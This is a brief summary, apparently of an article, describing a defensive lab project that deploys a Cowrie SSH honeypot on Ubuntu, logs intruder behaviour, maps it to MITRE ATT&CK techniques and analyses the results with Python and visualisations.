This project documents the deployment of a Cowrie honeypot on Ubuntu to capture and analyze real-time SSH intrusion behavior. From setting up port forwarding to logging attacker actions and mapping them to MITRE ATT&CK techniques, the piece walks through each stage of the attack lifecycle—from initial enumeration to attempted persistence and evasion. Using Python, regex, and data visualizations, the article serves as a practical cybersecurity lab and an ideal portfolio project for aspiring threat hunters and SOC analysts.